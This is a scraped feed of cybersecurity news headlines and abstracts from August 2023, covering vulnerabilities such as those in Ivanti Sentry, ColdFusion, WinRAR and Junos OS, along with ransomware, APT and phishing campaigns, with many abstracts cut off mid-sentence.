Software services provider Ivanti is warning of a new critical zero-day flaw impacting Ivanti Sentry (formerly MobileIron Sentry) that it said is being actively exploited in the wild, marking an escalation of its security woes. Tracked as CVE-2023-38035 (CVSS score: 9.8), the issue has been described as a case of authentication bypass impacting versions 9.18 and prior due to what it called an due to an insufficiently restrictive Apache HTTPD configuration. "If exploited, this vulnerability enables an unauthenticated actor to access some sensitive APIs that are used to configure the Ivanti Sentry on the administrator portal (port 8443, commonly MICS)," the company said . "While the issue has a high CVSS score, there is a low risk of exploitation for customers who do not expose port 8443 to the internet." Successful exploitation of the bug could allow an attacker to change configuration, run system commands, or write files onto the system. It's recommenThe Hacker News
August 22, 2023 – Government
CISA adds critical Adobe ColdFusion flaw to its Known Exploited Vulnerabilities catalog Full Text
Abstract
US CISA added critical vulnerability CVE-2023-26359 in Adobe ColdFusion to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added a critical flaw CVE-2023-26359 (CVSS score 9.8) affecting...Security Affairs
August 22, 2023 – Breach
Snatch Gang Claims the Hack of South Africa’s Department of Defense Full Text
Abstract
The group claims to have stolen military contracts, internal call signs, and personal data, amounting to 1.6 TB. If the attack gets confirmed, the disclosure of confidential information poses a serious risk to organizations involved in the contracts.Cyware
August 22, 2023 – Vulnerabilities
Critical Adobe ColdFusion Flaw Added to CISA’s Exploited Vulnerability Catalog Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical security flaw in Adobe ColdFusion to its Known Exploited Vulnerabilities ( KEV ) catalog, based on evidence of active exploitation. The vulnerability, cataloged as CVE-2023-26359 (CVSS score: 9.8), relates to a deserialization flaw present in Adobe ColdFusion 2018 (Update 15 and earlier) and ColdFusion 2021 (Update 5 and earlier) that could result in arbitrary code execution in the context of the current user without requiring any interaction. Deserialization (aka unmarshaling) refers to the process of reconstructing a data structure or an object from a byte stream. But when it's performed without validating its source or sanitizing its contents, it can lead to unexpected consequences such as code execution or denial-of-service (DoS). It was patched by Adobe as part of updates issued in March 2023. As of writing, it's immediately not clear how the flaw is being abused in the wilThe Hacker News
August 22, 2023 – Attack
A cyber attack hit the Australian software provider Energy One Full Text
Abstract
The Australian software provider Energy One announced it was hit by a cyberattack last week that affected certain corporate systems in Australia and the UK. The Australian software provider Energy One announced that a cyberattack hit certain corporate...Security Affairs
August 22, 2023
Carderbee APT Uses Legitimate Software in Supply Chain Attack Targeting Hong Kong Firms Full Text
Abstract
The group appears to be skilled and patient, selectively pushing payloads to specific victims. The use of signed malware and supply chain attacks makes it difficult for security software to detect.Cyware
August 22, 2023 – Vulnerabilities
Ivanti fixed a new critical Sentry API authentication bypass flaw Full Text
Abstract
Ivanti warned customers of a new critical Sentry API authentication bypass vulnerability tracked as CVE-2023-38035. The software company Ivanti released urgent security patches to address a critical-severity vulnerability, tracked as CVE-2023-38035...Security Affairs
August 22, 2023 – Business
Grip Security Raises $41 Million to Accelerate Growth and Extend its Market Full Text
Abstract
The investment brings Grip Security’s total funding to $66 million and marks a major milestone for the company, further accelerating its go-to-market strategy and advancing product development.Cyware
August 22, 2023 – Breach
Ukrainian Hackers Claim to Leak Emails of Russian Parliament Deputy Chief Full Text
Abstract
Ukrainian hackers claim to have broken into the email account of a senior Russian politician and exposed documents that allegedly prove his involvement in money laundering and sanction evasion schemes.Cyware
August 22, 2023 – Business
Cerby Raises $17 Million for Access Management Platform for Nonstandard Applications Full Text
Abstract
The investment round was led by Two Sigma Ventures, with additional funding from Outpost Ventures, AV8, Bowery Capital, Founders Fund, Incubate Fund, Okta Ventures, Ridge Ventures, Salesforce Ventures, and Tau Ventures.Cyware
August 21, 2023 – Phishing
Researchers Spoof an Apple Device and Trick Users Into Sharing Sensitive Data Full Text
Abstract
The spoofed Apple device prompts users to connect their Apple ID or share a password with a nearby Apple TV, allowing threat actors to collect data such as phone numbers and Apple ID emails.Cyware
August 21, 2023 – Vulnerabilities
New WinRAR Vulnerability Could Allow Hackers to Take Control of Your PC Full Text
Abstract
A high-severity security flaw has been disclosed in the WinRAR utility that could be potentially exploited by a threat actor to achieve remote code execution on Windows systems. Tracked as CVE-2023-40477 (CVSS score: 7.8), the vulnerability has been described as a case of improper validation while processing recovery volumes. "The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer," the Zero Day Initiative (ZDI) said in an advisory. "An attacker can leverage this vulnerability to execute code in the context of the current process." Successful exploitation of the flaw requires user interaction in that the target must be lured into visiting a malicious page or by simply opening a booby-trapped archive file. A security researcher, who goes by the alias goodbyeselene, has been credited with discovering and reporting the flaw on June 8, 2023. The issue has been addressThe Hacker News
August 21, 2023 – Breach
BlackCat ransomware group claims the hack of Seiko network Full Text
Abstract
The BlackCat/ALPHV ransomware group claims to have hacked the Japanese maker of watches Seiko and added the company to its data leak site. On August 10, 2023, the Japanese maker of watches Seiko disclosed a data breach following a cyber attack. "Seiko...Security Affairs
August 21, 2023 – Malware
HiatusRAT Returns after a Hiatus in a Fresh Wave of Attacks Full Text
Abstract
The HiatusRAT malware group reemerged to target Taiwan-based organizations and a U.S. military procurement system allegedly to snoop on military contracts. The audacity of threat actors is evident in their disregard for previous disclosures and their minimal efforts to change their payload servers. ... Read MoreCyware
August 21, 2023 – Solution
How to Investigate an OAuth Grant for Suspicious Activity or Overly Permissive Scopes Full Text
Abstract
From a user's perspective, OAuth works like magic. In just a few keystrokes, you can whisk through the account creation process and gain immediate access to whatever new app or integration you're seeking. Unfortunately, few users understand the implications of the permissions they allow when they create a new OAuth grant, making it easy for malicious actors to manipulate employees into giving away unintended access to corporate environments. In one of the highest-profile examples , Pawn Storm's attacks against the Democratic National Convention and others leveraged OAuth to target victims through social engineering. Security and IT teams would be wise to establish a practice of reviewing new and existing OAuth grants programmatically to catch risky activity or overly-permissive scopes. And, there are new solutions for SaaS security cropping up that can make this process easier. Let's take a look at some best practices for prioritizing and investigating your organization's grantsThe Hacker News
August 21, 2023 – Attack
New HiatusRAT campaign targets Taiwan and U.S. military procurement system Full Text
Abstract
HiatusRAT malware operators resurfaced with a new wave of attacks targeting Taiwan-based organizations and a U.S. military procurement system. In March 2023, Lumen Black Lotus Labs researchers uncovered a sophisticated campaign called “HiatusRAT”...Security Affairs
August 21, 2023 – Criminals
Researchers Uncover Real Identity of CypherRAT and CraxsRAT Malware Developer Full Text
Abstract
The CraxsRAT builder, Cyfirma says, generates highly obfuscated packages, allowing threat actors to customize the contents based on the type of attack they are preparing, including with WebView page injections.Cyware
August 21, 2023 – Malware
This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers Full Text
Abstract
Threat actors are leveraging access to malware-infected Windows and macOS machines to deliver a proxy server application and use them as exit nodes to reroute proxy requests. According to AT&T Alien Labs, the unnamed company that offers the proxy service operates more than 400,000 proxy exit nodes, although it's not immediately clear how many of them were co-opted by malware installed on infected machines without user knowledge and interaction. "Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device," the cybersecurity company said it found evidence where "malware writers are installing the proxy silently in infected systems." Multiple malware families have been observed delivering the proxy to users searching for cracked software and games. The proxy software, written in the Go programming language, is capable of targeting both Windows and macOS, with the former capable oThe Hacker News
August 21, 2023 – Vulnerabilities
Spoofing an Apple device and tricking users into sharing sensitive data Full Text
Abstract
White hat hackers at the recent hacking conference Def Con demonstrated how to spoof an Apple device and trick users into sharing their sensitive data. At the recent Def Con hacking conference, white hat hackers demonstrated how to spoof an Apple...Security Affairs
August 21, 2023 – Breach
Tesla Discloses Data Breach Impacting 75,000 People’s Personal Information Full Text
Abstract
A notification letter sent to impacted people reveals that the data breach is related to a couple of former employees sending confidential information to German media outlet Handelsblatt.Cyware
August 21, 2023 – Malware
HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack Full Text
Abstract
The threat actors behind the HiatusRAT malware have returned from their hiatus with a new wave of reconnaissance and targeting activity aimed at Taiwan-based organizations and a U.S. military procurement system. Besides recompiling malware samples for different architectures, the artifacts are said to have been hosted on new virtual private servers (VPSs), Lumen Black Lotus Labs said in a report published last week. The cybersecurity firm described the activity cluster as "brazen" and "one of the most audacious," indicating no signs of slowing down. The identity and the origin of the threat actors are presently unknown. Targets included commercial firms, such as semiconductor and chemical manufacturers, and at least one municipal government organization in Taiwan as well as a U.S. Department of Defense (DoD) server associated with submitting and retrieving proposals for defense contracts. HiatusRAT was first disclosed by the cybersecurity company in MarchThe Hacker News
August 21, 2023 – Government
Israel and US to Invest $3.85 Million in projects for critical infrastructure protection through the BIRD Cyber Program Full Text
Abstract
Israel and US government agencies announced the BIRD Cyber Program, an investment of roughly $4M in projects to enhance the cyber resilience of critical infrastructure. The BIRD Cyber Program is a joint initiative from the Israel National Cyber Directorate...Security Affairs
August 21, 2023 – Policy and Law
Federally Insured Credit Unions Required to Report Cyber Incidents Within 72 Hours Full Text
Abstract
The new policy, National Credit Union Administration (NCUA) announced, comes into effect on September 1, and will cover all incidents that impact information systems or the integrity, confidentiality, or availability of data on those systems.Cyware
August 21, 2023 – Criminals
Australia’s .AU Domain Administrator Denies Data Breach After Ransomware Posting Full Text
Abstract
The organization that manages Australia’s internet domain .au denied that it was affected by a data breach on Friday after a ransomware gang added it to their list of victims.Cyware
August 20, 2023
N. Korean Kimsuky APT targets S. Korea-US military exercises Full Text
Abstract
North Korea-linked APT Kimsuky launched a spear-phishing campaign targeting US contractors working at the war simulation centre. North Korea-linked APT group Kimsuky carried out a spear-phishing campaign against US contractors involved in a joint...Security Affairs
August 20, 2023 – Vulnerabilities
Four Juniper Junos OS flaws can be chained to remotely hack devices Full Text
Abstract
Juniper Networks addressed multiple flaws in the J-Web component of Junos OS that could be chained to achieve remote code execution. Juniper Networks has released an "out-of-cycle" security update to address four vulnerabilities in the J-Web component...Security Affairs
August 20, 2023 – General
Security Affairs newsletter Round 433 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Over...Security Affairs
August 20, 2023 – Solution
Cybersecurity: CASB vs SASE Full Text
Abstract
Understanding cybersecurity aspects addressed by Cloud Access Security Broker (CASB) and Secure Access Service Edge (SASE) In an increasingly digital world, where businesses rely on cloud services and remote access, cybersecurity has become paramount....Security Affairs
August 19, 2023 – Attack
Germany’s National Bar Association Investigating Ransomware Attack Full Text
Abstract
The German Federal Bar (BRAK) Association discovered the attack on August 2. The group is an umbrella organization overseeing 28 regional bars across Germany and representing about 166,000 lawyers nationally and internationally.Cyware
August 19, 2023 – Malware
WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams Full Text
Abstract
Cybersecurity researchers have detailed an updated version of an advanced fingerprinting and redirection toolkit called WoofLocker that's engineered to conduct tech support scams. The sophisticated traffic redirection scheme was first documented by Malwarebytes in January 2020, leveraging JavaScript embedded in compromised websites to perform anti-bot and web traffic filtering checks to serve next-stage JavaScript that redirects users to a browser locker (aka browlock). This redirection mechanism, in turn, makes use of steganographic tricks to conceal the JavaScript code within a PNG image that's served only when the validation phase is successful. Should a user be detected as a bot or not interesting traffic, a decoy PNG file without the malicious code is used. WoofLocker is also known as 404Browlock due to the fact that visiting the browlock URL directly without the appropriate redirection or one-time session token results in a 404 error page. The cybersecurity firm&The Hacker News
August 19, 2023 – Ransomware
Cuba Ransomware Deploys New Tools to Target U.S. Critical Infrastructure Sector and IT Integrator in Latin America Full Text
Abstract
The group's toolkit includes custom and off-the-shelf parts, such as the BUGHATCH downloader and the Metasploit framework. The attacks often start with the compromise of valid credentials through a credentials reuse scheme or vulnerability exploits.Cyware
August 19, 2023 – Vulnerabilities
New Juniper Junos OS Flaws Expose Devices to Remote Attacks - Patch Now Full Text
Abstract
Networking hardware company Juniper Networks has released an "out-of-cycle" security update to address multiple flaws in the J-Web component of Junos OS that could be combined to achieve remote code execution on susceptible installations. The four vulnerabilities have a cumulative CVSS rating of 9.8, making them Critical in severity. They affect all versions of Junos OS on SRX and EX Series. "By chaining exploitation of these vulnerabilities, an unauthenticated, network-based attacker may be able to remotely execute code on the devices," the company said in an advisory released on August 17, 2023. The J-Web interface allows users to configure, manage, and monitor Junos OS devices. A brief description of the flaws is as follows - CVE-2023-36844 and CVE-2023-36845 (CVSS scores: 5.3) - Two PHP external variable modification vulnerabilities in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker toThe Hacker News
August 19, 2023 – Breach
Illinois Hospital Notifies Patients, Employees of Data Breach After Royal Gang Posting Full Text
Abstract
In late May, reports said the Royal ransomware gang had posted data from the organization on its leak site. As of May 23, the hospital had said it was still investigating the incident.Cyware
August 19, 2023 – Malware
Thousands of Android Malware Apps Using Stealthy APK Compression to Evade Detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unknown or unsupported compression methods to elude malware analysis. That's according to findings from Zimperium, which found 3,300 artifacts leveraging such compression algorithms in the wild. 71 of the identified samples can be loaded on the operating system without any problems. There is no evidence that the apps were available on the Google Play Store at any point in time, indicating that the apps were distributed through other means, typically via untrusted app stores or social engineering to trick the victims into sideloading them. The APK files use "a technique that limits the possibility of decompiling the application for a large number of tools, reducing the possibilities of being analyzed," security researcher Fernando Ortega said . "In order to do that, the APK (which is in essence a ZIP file), is using an unsupported decompression method." The advantage of such an approach is its abilitThe Hacker News
August 19, 2023 – Vulnerabilities
Update: Companies Respond to ‘Downfall’ Intel CPU Vulnerability Full Text
Abstract
AWS said its customers’ data and cloud instances are not affected by Downfall and no action is required. The cloud giant did note that it has “designed and implemented its infrastructure with protections against this class of issues”.Cyware
August 19, 2023 – Criminals
Ransomware Gang Threatens Raleigh Housing Authority Months After Devastating Attack Full Text
Abstract
A ransomware gang has started posting sensitive personal information connected to a devastating attack on the Raleigh Housing Authority (RHA) that disrupted the organization for weeks in May.Cyware
August 19, 2023 – Malware
Over 3,000 Android Malware spotted using unsupported/unknown compression methods to avoid detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unsupported compression methods to prevent malware analysis. On June 28th, researchers from Zimperium zLab researchers observed that Joe Sandbox announced the availability of an Android APK that...Security Affairs
August 19, 2023 – Criminals
Update: Man Arrested in Northern Ireland Police Data Leak Full Text
Abstract
The unnamed man was questioned by detectives who were said to be "investigating criminality linked to last week's freedom of information data breach," but has now been released on bail to allow for further inquiries, the PSNI stated.Cyware
August 18, 2023 – Phishing
Cloaked Malvertising: Unmasking Complex Fingerprinting and Evading Detection Full Text
Abstract
Malwarebytes Labs identified a new trend in malvertising campaigns that use advanced cloaking techniques to evade detection. Threat actors are targeting the users of popular IT programs by creating malicious ads displayed on Google search results. To safeguard against ever-evolving malvertising tac ... Read MoreCyware
August 18, 2023 – Criminals
14 Suspected Cybercriminals Arrested Across Africa in Coordinated Crackdown Full Text
Abstract
A coordinated law enforcement operation across 25 African countries has led to the arrest of 14 suspected cybercriminals, INTERPOL announced Friday. The exercise, conducted in partnership with AFRIPOL, enabled investigators to identify 20,674 cyber networks that were linked to financial losses of more than $40 million. "The four-month Africa Cyber Surge II operation was launched in April 2023 and focused on identifying cybercriminals and compromised infrastructure," the agency said. As part of the operation, three suspects were arrested in Cameroon in connection with an online scam involving the fraudulent sale of works of art worth $850,000. Another suspect was arrested in Nigeria for defrauding a Gambian victim. Also arrested were two money mules linked to scams initiated through messaging platforms. The cyber networks comprised 3,786 command-and-control (C2) servers, 14,134 victim IP addresses tied to data stealer infections, 1,415 phishing links and domains, 939The Hacker News
August 18, 2023 – Vulnerabilities
WinRAR flaw enables remote code execution of arbitrary code Full Text
Abstract
A flaw impacting the file archiver utility for Windows WinRAR can allow the execution of commands on a computer by opening an archive. WinRAR is a popular file compression and archival utility for Windows operating systems. The utility is affected...Security Affairs
August 18, 2023 – Phishing
Ongoing Phishing Campaign Targets Zimbra Credentials Full Text
Abstract
ESET uncovered an ongoing phishing campaign targeting Zimbra Collaboration users, aiming to harvest their Zimbra account credentials. The phishing emails lure victims by posing as email server updates, account deactivations, or similar issues, and directing them to click on an attached HTML file. S ... Read MoreCyware
August 18, 2023 – Education
The Vulnerability of Zero Trust: Lessons from the Storm 0558 Hack Full Text
Abstract
While IT security managers in companies and public administrations rely on the concept of Zero Trust, APTS (Advanced Persistent Threats) are putting its practical effectiveness to the test. Analysts, on the other hand, understand that Zero Trust can only be achieved with comprehensive insight into one's own network. Just recently, an attack believed to be perpetrated by the Chinese hacker group Storm-0558 targeted several government agencies. They used fake digital authentication tokens to access webmail accounts running on Microsoft's Outlook service. In this incident, the attackers stole a signing key from Microsoft, enabling them to issue functional access tokens for Outlook Web Access (OWA) and Outlook.com and to download emails and attachments. Due to a plausibility check error, the digital signature, which was only intended for private customer accounts (MSA), also worked in the Azure Active Directory for business customers. Embracing the Zero Trust Revolution AccThe Hacker News
August 18, 2023 – Hacker
#OpFukushima: Anonymous group protests against the plan to dump Fukushima RADIOACTIVE wastewater into Pacific Full Text
Abstract
#OpFukushima: The famous collective Anonymous has launched cyberattacks against Japan nuclear websites over Fukushima water plan. The hacker collective Anonymous has launched cyberattacks against nuclear power-linked groups in Japan as part of an operation...Security Affairs
August 18, 2023 – Phishing
Behind WoofLocker: Long-running Traffic Diversion Scheme Full Text
Abstract
The long-standing WoofLocker tech support scam campaign, initiated in 2017, remains active with enhanced resilience as it employs a unique traffic redirection approach on compromised websites. Redirecting targeted users to a fake virus warning browser locker screen, WoofLocker has exhibited stabili ... Read MoreCyware
August 18, 2023 – Attack
New Wave of Attack Campaign Targeting Zimbra Email Users for Credential Theft Full Text
Abstract
A new "mass-spreading" social engineering campaign is targeting users of the Zimbra Collaboration email server with an aim to collect their login credentials for use in follow-on operations. The activity, active since April 2023 and still ongoing, targets a wide range of small and medium businesses and governmental entities, most of which are located in Poland, Ecuador, Mexico, Italy, and Russia. It has not been attributed to any known threat actor or group. "Initially, the target receives an email with a phishing page in the attached HTML file," ESET researcher Viktor Šperka said in a report. "The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file." The messages also spoof the from address to appear as if they are coming from a Zimbra administrator in a likely attempt to convince the recipients into opening the attachment. The HTML file contains a Zimbra loThe Hacker News
August 18, 2023 – Phishing
Massive phishing campaign targets users of the Zimbra Collaboration email server Full Text
Abstract
A massive social engineering campaign is targeting users of the Zimbra Collaboration email server to steal their login credentials. ESET researchers uncovered a mass-spreading phishing campaign targeting users of the Zimbra Collaboration email server...Security Affairs
August 18, 2023 – Phishing
Catching up With Wooflocker, the Most Elaborate Traffic Redirection Scheme to Tech Support Scams Full Text
Abstract
The WoofLocker tech support scam campaign, which was first discovered in 2020, is still active and has evolved to become more sophisticated. The campaign relies on compromised websites to distribute its malicious code, with a focus on adult websites.Cyware
August 18, 2023 – Ransomware
New BlackCat Ransomware Variant Adopts Advanced Impacket and RemCom Tools Full Text
Abstract
Microsoft on Thursday disclosed that it found a new version of the BlackCat ransomware (aka ALPHV and Noberus) that embeds tools like Impacket and RemCom to facilitate lateral movement and remote code execution. "The Impacket tool has credential dumping and remote service execution modules that could be used for broad deployment of the BlackCat ransomware in target environments," the company's threat intelligence team said in a series of posts on X (formerly Twitter). "This BlackCat version also has the RemCom hacktool embedded in the executable for remote code execution. The file also contains hardcoded compromised target credentials that actors use for lateral movement and further ransomware deployment." RemCom, billed as an open-source alternative to PsExec, has been put to use by Chinese and Iranian nation-state threat actors like Dalbit and Chafer (aka Remix Kitten) to move across the victim environments in the past. Redmond said it startedThe Hacker News
August 18, 2023 – Policy and Law
Africa Cyber Surge II law enforcement operation has led to the arrest of 14 suspects Full Text
Abstract
An international law enforcement operation across 25 African countries has led to the arrest of 14 cybercriminals. A coordinated law enforcement operation conducted by INTERPOL and AFRIPOL across 25 African countries has led to the arrest of 14 suspected...Security Affairs
August 18, 2023 – Attack
Cleveland City School District Suffers Ransomware Attack Full Text
Abstract
Cleveland City Schools say they are dealing with the aftermath of a ransomware attack Tuesday. They say less than 5% of faculty and staff devices were affected. A CCS spokesperson says their printers are down.Cyware
August 18, 2023 – Solution
Google Chrome’s New Feature Alerts Users About Auto-Removal of Malicious Extensions Full Text
Abstract
Google has announced plans to add a new feature in the upcoming version of its Chrome web browser to alert users when an extension they have installed has been removed from the Chrome Web Store. The feature, set for release alongside Chrome 117, allows users to be notified when an add-on has been unpublished by a developer, taken down for violating Chrome Web Store policy, or marked as malware. The tech giant said it intends to highlight such extensions under a "Safety check" category in the "Privacy and security" section of the browser settings page. "When a user clicks 'Review,' they will be taken to their extensions and given the choice to either remove the extension or hide the warning if they wish to keep the extension installed," Oliver Dunk, a developer relations engineer for Chrome extensions, said . "As in previous versions of Chrome, extensions marked as malware are automatically disabled." The development comes as the cThe Hacker News
August 18, 2023
Bronze Starlight targets the Southeast Asian gambling sector Full Text
Abstract
Experts warn of an ongoing campaign attributed to China-linked Bronze Starlight that is targeting the Southeast Asian gambling sector. SentinelOne observed China-linked APT group Bronze Starlight (aka APT10, Emperor Dragonfly or Storm-0401) targeting...Security Affairs
August 18, 2023 – Education
Security Basics Aren’t So Basic — They’re Hard Full Text
Abstract
Fundamental defenses — identity and access management, MFA, memory-safe languages, patching and vulnerability management — are lacking or nonexistent across the economy, according to cybersecurity experts.Cyware
August 18, 2023 – Hacker
Chinese Hackers Accused of Targeting Southeast Asian Gambling Sector Full Text
Abstract
Hackers based in China are targeting the gambling sector across Southeast Asia in a campaign that researchers say is closely related to data collection and surveillance operations identified earlier this year.Cyware
August 17, 2023 – Vulnerabilities
NoFilter Attack: Sneaky Privilege Escalation Method Bypasses Windows Security Full Text
Abstract
A previously undetected attack method called NoFilter has been found to abuse the Windows Filtering Platform ( WFP ) to achieve privilege escalation in the Windows operating system. "If an attacker has the ability to execute code with admin privilege and the target is to perform LSASS Shtinkering , these privileges are not enough," Ron Ben Yizhak, a security researcher at Deep Instinct, told The Hacker News. "Running as "NT AUTHORITY\SYSTEM" is required. The techniques described in this research can escalate from admin to SYSTEM." The findings were presented at the DEF CON security conference over the weekend. The starting point of the research is an in-house tool called RPC Mapper the cybersecurity company used to map remote procedure call ( RPC ) methods, specifically those that invoke WinAPI , leading to the discovery of a method named "BfeRpcOpenToken," which is part of WFP. WFP is a set of API and system services that'sThe Hacker News
August 17, 2023
APT29 is targeting Ministries of Foreign Affairs of NATO-aligned countries Full Text
Abstract
Russia-linked APT29 used the Zulip Chat App in attacks aimed at ministries of foreign affairs of NATO-aligned countries EclecticIQ researchers uncovered an ongoing spear-phishing campaign conducted by Russia-linked threat actors targeting Ministries...Security Affairs
August 17, 2023 – Hacker
China-Linked Bronze Starlight Group Targeting Gambling Sector with Cobalt Strike Beacons Full Text
Abstract
An ongoing cyber attack campaign originating from China is targeting the Southeast Asian gambling sector to deploy Cobalt Strike beacons on compromised systems. Cybersecurity firm SentinelOne said the tactics, techniques, and procedures point to the involvement of a threat actor tracked as Bronze Starlight (aka Emperor Dragonfly or Storm-0401), which has been linked to the use of short-lived ransomware families as a smokescreen to conceal its espionage motives. "The threat actors abuse Adobe Creative Cloud, Microsoft Edge, and McAfee VirusScan executables vulnerable to DLL hijacking to deploy Cobalt Strike beacons," security researchers Aleksandar Milenkoski and Tom Hegel said in an analysis published today. It also bears noting that the campaign exhibits overlaps with an intrusion set monitored by ESET under the name Operation ChattyGoblin . This activity, in turn, shares commonalities with a supply chain attack that came to light last year leveraging a trojaThe Hacker News
August 17, 2023 – Phishing
A massive campaign delivered a proxy server application to 400,000 Windows systems Full Text
Abstract
Researchers discovered a massive campaign that delivered a proxy server application to at least 400,000 Windows systems. AT&T Alien Labs researchers uncovered a massive campaign that delivered a proxy server application to at least 400,000 Windows...Security Affairs
August 17, 2023 – Vulnerabilities
New Apple iOS 16 Exploit Enables Stealthy Cellular Access Under Fake Airplane Mode Full Text
Abstract
Cybersecurity researchers have documented a novel post-exploit persistence technique on iOS 16 that could be abused to fly under the radar and maintain access to an Apple device even when the victim believes it is offline. The method "tricks the victim into thinking their device's Airplane Mode works when in reality the attacker (following successful device exploit) has planted an artificial Airplane Mode which edits the UI to display Airplane Mode icon and cuts internet connection to all apps except the attacker application," Jamf Threat Labs researchers Hu Ke and Nir Avraham said in a report shared with The Hacker News. Airplane Mode , as the name implies, allows users to turn off wireless features in their devices, effectively preventing them from connecting to Wi-Fi networks, cellular data, and Bluetooth as well as sending or receiving calls and text messages. The approach devised by Jamf, in a nutshell, provides an illusion to the user that the Airplane Mode isThe Hacker News
August 17, 2023 – General
Alarming lack of cybersecurity practices on world’s most popular websites Full Text
Abstract
The world’s most popular websites lack basic cybersecurity hygiene, an investigation by Cybernews shows. Do you happen to love exploring DIY ideas on Pinterest? Scrolling through IMDB to pick the next movie to watch? Or simply scrolling through...Security Affairs
August 17, 2023 – Vulnerabilities
New LABRAT Campaign Exploits GitLab Flaw for Cryptojacking and Proxyjacking Activities Full Text
Abstract
A new, financially motivated operation dubbed LABRAT has been observed weaponizing a now-patched critical flaw in GitLab as part of a cryptojacking and proxyjacking campaign. "The attacker utilized undetected signature-based tools, sophisticated and stealthy cross-platform malware, command-and-control (C2) tools which bypassed firewalls, and kernel-based rootkits to hide their presence," Sysdig said in a report shared with The Hacker News. "Furthermore, the attacker abused a legitimate service, TryCloudflare , to obfuscate their C2 network." Proxyjacking allows the attacker to rent the compromised host out to a proxy network, making it possible to monetize the unused bandwidth. Cryptojacking, on the other hand, refers to the abuse of the system resources to mine cryptocurrency. A notable aspect of the campaign is the use of compiled binaries written in Go and .NET to fly under the radar, with LABRAT also providing backdoor access to the infected systems.The Hacker News
August 17, 2023 – Vulnerabilities
Experts devise an exploit for Apple iOS 16 that relies on fake Airplane Mode Full Text
Abstract
Researchers detailed a new exploit for Apple iOS 16 that can allow attackers to gain access to a device even when the victim believes it is in Airplane Mode. Jamf Threat Labs researchers developed a post-exploit persistence technique on iOS 16 that...Security Affairs
August 17, 2023 – Outage
Cleaning Products manufacturer Clorox Company took some systems offline after a cyberattack Full Text
Abstract
Cleaning products manufacturer Clorox Company announced that it has taken some systems offline in response to a cyberattack. The Clorox Company is a multinational consumer goods company that specializes in the production and marketing of various household...Security Affairs
August 11, 2023 - Vulnerabilities
Magento Shopping Cart Attack Targets Critical Vulnerability Full Text
Abstract
Security researchers at Akamai say they have identified a server-side template injection campaign aimed at Magneto 2 shops that have yet to address CVE-2022-24086, an input validation flaw with a CVSS score of 9.8.Cyware
August 11, 2023 – Attack
Researchers Uncover Years-Long Cyber Espionage on Foreign Embassies in Belarus Full Text
Abstract
A hitherto undocumented threat actor operating for nearly a decade and codenamed MoustachedBouncer has been attributed to cyber espionage attacks aimed at foreign embassies in Belarus. "Since 2020, MoustachedBouncer has most likely been able to perform adversary-in-the-middle (AitM) attacks at the ISP level, within Belarus, in order to compromise its targets," ESET security researcher Matthieu Faou said , describing the group as skilled and advanced. The adversary, active since at least 2014, is assessed to be aligned with Belarusian interests, likely employing a lawful interception system such as SORM to conduct its AitM attacks as well as deploy disparate tools called NightClub and Disco. Both the Windows malware frameworks support additional spying plugins including a screenshotter, an audio recorder, and a file stealer. The oldest sample of NightClub dates back to November 19, 2014, when it was uploaded to VirusTotal from Ukraine. Embassy staff from four differThe Hacker News
August 11, 2023 – Education
The Evolution of API: From Commerce to Cloud Full Text
Abstract
API (or Application Programming Interface) is a ubiquitous term in the tech community today, and it’s one with a long history. As a concept, APIs (or Application Programming Interfaces) have been around since the 1950s. What started out as a potential...Security Affairs
August 11, 2023 – Attack
Charming Kitten Hackers Target Iranian Dissidents in Germany Full Text
Abstract
The Federal Office for the Protection of the Constitution (BfV) reported it had found concrete attempts by the group known as Charming Kitten to target the Iranian opposition and exiles based in Germany.Cyware
August 11, 2023 – Encryption
Enhancing TLS Security: Google Adds Quantum-Resistant Encryption in Chrome 116 Full Text
Abstract
Google has announced plans to add support for quantum-resistant encryption algorithms in its Chrome browser, starting with version 116. "Chrome will begin supporting X25519Kyber768 for establishing symmetric secrets in TLS , starting in Chrome 116, and available behind a flag in Chrome 115," Devon O'Brien said in a post published Thursday. Kyber was chosen by the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) as the candidate for general encryption in a bid to tackle future cyber attacks posed by the advent of quantum computing. Kyber-768 is roughly the security equivalent of AES-192 . The encryption algorithm has already been adopted by Cloudflare , Amazon Web Services , and IBM. X25519Kyber768 is a hybrid algorithm that combines the output of X25519 , an elliptic curve algorithm widely used for key agreement in TLS, and Kyber-768 to create a strong session key to encrypt TLS connections. "Hybrid mechanismThe Hacker News
August 11, 2023 – Botnet
Gafgyt botnet is targeting EoL Zyxel routers Full Text
Abstract
Researchers warn that the Gafgyt botnet is actively exploiting a vulnerability impacting the end-of-life Zyxel P660HN-T1A router. A variant of the Gafgyt botnet is actively attempting to exploit a vulnerability, tracked as CVE-2017-18368 (CVSS v3: 9.8),...Security Affairs
August 11, 2023 – Government
Ukrainian Official Touts Country’s Wartime Cyber Intelligence Efforts Full Text
Abstract
Intelligence gathered in cyberspace is helping Ukraine understand Russia's plans and stop the enemy from carrying them out, according to the country’s top cyber and information security official.Cyware
August 11, 2023
Researchers Shed Light on APT31’s Advanced Backdoors and Data Exfiltration Tactics Full Text
Abstract
